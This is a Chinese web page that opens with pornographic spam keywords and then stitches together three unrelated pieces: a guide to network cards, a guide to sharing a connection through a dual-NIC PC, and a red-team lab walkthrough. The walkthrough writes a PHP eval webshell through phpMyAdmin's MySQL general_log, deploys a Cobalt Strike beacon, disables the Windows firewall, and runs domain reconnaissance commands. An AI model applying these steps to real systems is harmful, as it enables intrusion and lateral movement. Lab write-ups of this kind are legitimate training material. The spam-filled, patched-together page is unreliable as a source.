操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    卡是電腦必備的硬件接口之一,是可以上網沖浪的前提。一般情況下,移動終端(手機、PAD等設備)多用的是無線網卡,PC端以主板上的網卡為主。目前主流的網卡都是千兆的,很多主板也都將高性能網卡作為賣點之一,甚至部分高端主板集成了2.5G網卡,這類集成網卡性能也非常優秀。如無其他需求,不用考慮升級獨立網卡。

    獨立網卡

    那么,什么情況下,我們需要換掉集成網卡或者加裝獨立網卡呢?

    是否需要獨立網卡?

    現在的百兆以上寬帶越來越普及,再加上今年的攜號轉網政策下達,三大運營商針對寬帶的資費將會下降到一定程度。盡管千兆寬帶現在還未能全面普及,但是百兆網卡在處理百兆寬帶時具有明顯的瓶頸。為什么會有瓶頸呢?因為百兆網卡處理百兆寬帶只是理論值,在實際使用中,不僅有信號衰減,而且設備基本實時不可能滿負載工作(超過80%就很費勁了),就會導致你的百兆寬帶經過百兆網卡傳輸后,實際能用的帶寬最大能到值在80-90之間。

    千兆網卡

    此外,在日常生活工作中,很多情況都會用到兩根網線。尤其是在很多場合,局域網和公網的之間的切換或者共存很有必要。對于局域網來說,在訪問網絡時都有諸多限制。然而很多時候不得不使用局域網,在使用局域網完畢之后,若想切回公網,在普通主板默認都只有一個網口的情況下,只能通過插拔網線的方式去更換,十分麻煩。

    主板單網卡

    高端雙網卡主板

    因此,如果你的寬帶已經不小于百兆,而主板搭載的卻是百兆網卡,或者你需要頻繁的在兩個網絡之間進行切換,那么加裝一個千兆獨立網卡就是更好的選擇。同時,雙網卡通過橋接的方式,還可以共存,不會出現網絡沖突的情況。

    如何加裝千兆獨立網卡?

    眾所周知,PCIE插槽具備優秀的擴充外設基因,而當下的主板基本都使用的是PCIE 3.0協議, PCIe 3.0協議的每一條Lane可支持984.6 MB/s 的速率。我們使用1x的千兆網卡,接在主板上PCIE的插槽上就可以了,常見的四種插槽均可以接入。

    PCIE 3.0速率圖示

    有些小伙伴只是希望網絡共用,那我們還有通過加裝無線網卡的方式來取代獨立網卡。有些人會覺得無線網卡安裝在臺式機內會有信號屏蔽等副作用。其實,一般與臺式機配備的無線網卡,都會有延長線將天線放在主機外,完全不用擔心。而且,如果你使用的最新的intel 300系列主板,且支持CNVI網絡技術,可以考慮優先選購intel專用網絡模塊,安裝到M.2無線網卡接口。因為M.2接口一般至少連著PCIE的兩條lane,相比較一條lane的普通PCIE 獨立網卡來說,網絡速度和性能都會更強。

    無線網卡模塊

    作為一名數碼科技愛好者,旨在為小伙伴們科普更多小知識,喜歡內容的話,關注一下唄。你當前有使用獨立網卡嗎?使用的用途是什么?不妨一起聊聊。

    日常家庭網絡使用中,遇到原本只有一臺電腦使用網絡的情況,這樣都是用電腦直接來連接網絡的,并沒有安裝路由器,但后續增加了電腦或者有移動設備需要用到網絡,但手頭并沒有現成的路由器,或者想要節省路由器的費用,那么是否可以將電腦改造成有路由器的功能呢?答案當然是肯定的。

    下面分幾種情況來看看怎么做吧

    臺式電腦雙網卡的情況

    這種情況的接線方法是一個網卡連接外網,一個網卡連接其它需要上網的電腦

    雙網卡電腦當路由器用

    • 網卡共享的方法

    雙網卡電腦設置:先將網卡1連接好外網設置好能上網的情況,然后在網卡1上右鍵屬性,選擇共享進行設置

    網絡共享設置

    然后確定可以看到如下提示,點擊是,

    另外需要上網的電腦設置:設置ip地址為 192.168.137.2 掩碼 255.255.255.0 網關 192.168.137.1, dns可從主電腦獲取,如此即可正常上網了。

    延伸:網卡2接交換機的話,后面所有電腦配置都是以192.168.137.1為網關即可。

    • 網橋共享的方法

    還有一種方法可以進行網絡共享,先將連接外網的網卡設置好可以正常上網,

    然后將連接外網的電腦的兩塊網卡進行橋接,如下圖所示,

    雙網卡進行橋接

    windows正在生成網橋

    橋接完成后生成網橋

    橋接完成后,將另一臺電腦的ip設置成跟網橋同段網絡,并將網關設置為網橋的ip地址即可完成上網設置。

    筆記本電腦有線網卡和無線網卡的情況

    這種方法跟上面情況略有不同,主要設置方法如下:

    有線網卡設置:連接到外網,設置好上網。

    無線網卡設置:進行虛擬wifi共享設置,打開開始菜單——運行——cmd, 輸入如下命令即可:

    虛擬wifi設置

    將有線網卡的網絡共享給虛擬wifi連接,

    設置虛擬wifi的網絡

    設置完成后,筆記本的無線網卡就成了一個wifi,可以供移動設備等連接wifi來上網。

    電腦單網卡+外裝一個無線網卡也可以跟上面同樣設置當wifi使用。


    只要有雙網卡,不需要路由器,就可以讓電腦當路由器用,給其他電腦共享網絡。解除沒有路由器的煩惱。

    x00:寫在前面

    此實戰靶場共3臺主機,先把拓撲圖理清楚。

    win7:處于DMZ區域的web服務器,雙網卡(橋接:192.168.0.101,nat:192.168.52.143)

    win2K3:內網域成員主機(nat:192.168.52.141)
    win2008r2:域控主機(nat:192.168.52.138)
    目的就是攻擊者通過拿下和外網相通的win7的shell,進而攻擊win7所處域,獲得域控桌面的flag,也就是敏感文件。

    介紹一下:此靶場紅日安全團隊紅隊評估實戰靶場第一關,難度不大,多種姿勢均可獲得域控權限,是練習域滲透各種姿勢很不錯的靶場,搭建方式也非常簡單,配置一下win7為雙網卡,橋接為模擬外網ip,nat模擬內網域環境。配置完雙網卡即可,dhcp方式獲取橋接ip。勿管nat網卡的ip,內網域環境已經搭建好了。ip配置完畢后,三臺虛機密碼均為hongrisec@2019。登錄win7啟動一下phpstudy,測試一下三臺虛機連通性后即可開始本次滲透。

    0x01:拿下DMZ區的win7

    DMZ區也就是處于兩個防火墻之間的,一個合格的DMZ區是為了提供外部主機訪問內網資源服務器的一個緩沖區域,應該有著嚴格的內外網隔離,本次靶場只是一個模擬,dmz區并沒有很合規。

    那么入手以后,先進行信息收集,橋接嘛,那么直接掃一下橋接網段的存活主機,方法多多,筆者比較喜歡用nmap -sP。

    也可以netdiscover -i en0 -r 192.168.0.1/24

    獲取了目標ip以后,就是掃端口:

    nmap -sV -vv -p1-65535 192.168.0.101

    訪問80得到一個phpstudy探針。

    最下面有個測試mysql連通的。

    輸入root/root回顯成功,hh 靶場嘛,很多生產環境中弱口令也是很多的。那么初步getshell思路就是通過mysql拿shell。

    dirsearch掃一下目錄發現存在phpmyadmin和beifen.rar

    直接登錄phpmyadmin頁面

    phpmyadmin頁面getshell方式有兩種:

    1:into_outfile寫shell

    條件:需要secure_file_priv為允許

    并不支持,那就嘗試另一個方式,寫日志getshell。

    日志備份獲取shell

    show global variables like "%genera%"; //查詢general_log配置

    set global general_log='on'; 開啟general log模式

    SET global general_log_file='C:/phpStudy/WWW/shell.php'; //設置日志文件保存路徑

    SELECT '<?php @eval($_POST['w']);?>'; //phpinfo()寫入日志文件

    set global general_log='off'; //關閉general_log模式


    shell寫入成功,蟻劍連接即可。

    成功getshell。

    那么拿shell還有另一種方法就是通過掃出來的備份文件beifen.rar,然后得yxcms的后臺賬號密碼,登錄后臺getshell。yxcms拿shell方法公網上很多,這里不多贅述。主要看如何進行內網漫游。

    0x02:內網信息收集

    拿到shell以后,有多種選擇,shell上進行信息收集,彈到msf上,彈到cs上,彈到empire上,這里選擇彈到cs上。

    起一個cs服務器然后客戶端連接,這里筆者用的是4.0版本。

    cs起一個監聽,生成一個windows exe木馬文件,通過蟻劍傳入目標機,再執行下面這句關閉防火墻,不然目標會彈防火墻警告框。

    netsh advfirewall set allprofiles state of

    shell執行一下exe即可。

    執行后成功上線,調整一下心跳,這里為純內網練習,心跳為0即可。

    beacon執行:sleep 0

    接下來就是信息收集過程。

    ipconfig /all

    還發現另一個網段ip:192.168.52.143;

    且當前主機是存在域內的,初步判斷域名為god.org;

    執行:whoami,hostname


    查詢系統體系架構:echo %PROCESSOR_ARCHITECTURE%

    查詢已安裝的軟件及版本信息:wmic product get name,version

    查看當前運行進程:wmic process list brief

    當前并無殺軟。

    關于域相關信息收集

    判斷當前主機是否在域內。

    上篇文章已經提供了相關信息收集姿勢,

    這里用:net time /domain

    說明當前主機確實存在域內,接下來就是確定域控ip。

    查看當前域的所有用戶:net user /domain

    獲取域內用戶的詳細信息:wmic useraccount get /all

    這里會回顯出用戶的SID,對于后續的憑據利用提前做信息收集。

    查看域管理員:net group "domain controllers" /domain

    再進行ping域控主機即可獲得域控IP:192.168.52.138

    查看所有域成員計算機列表:net group "domain computers" /domain

    查看本地管理組:net localgroup administrators /domain

    查看本地所有用戶:net user

    CS也有個探測內網環境功能,這里進行如下選擇:

    查看目標得知以下內容,獲知當前內網主機列表,這里通過初步探測,141和143為域內主機,138為域內域控。

    也可以通過Ladon這個域信息收集神器來進行存活主機探測。

    CS4.0腳本管理器導入Ladon.cna即可,下載地址如下:

    https://github.com/rsmudge/ElevateKit

    用法:Ladon 192.168.52.0/24 OsScan

    Ladon是一個非常了不起的內網信息收集工具。

    使用方法詳情見官方文檔:http://k8gege.org/p/648af4b3.html

    會顯示出非常詳細的信息,例如版本以及是否為虛擬機。后續可以使用BloodHound進行測繪攻擊路線。

    0x03:內網橫向移動

    到這里為止,我們已經確定了此靶場的域控ip以及域內基本拓撲圖,接下來就是設置代理進行橫向移動打域控,對于此靶場來說,獲取域控權限方式很多,下一期拿這個靶場進行域內漫游的方法小合集,拿到域控主機桌面的flag。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有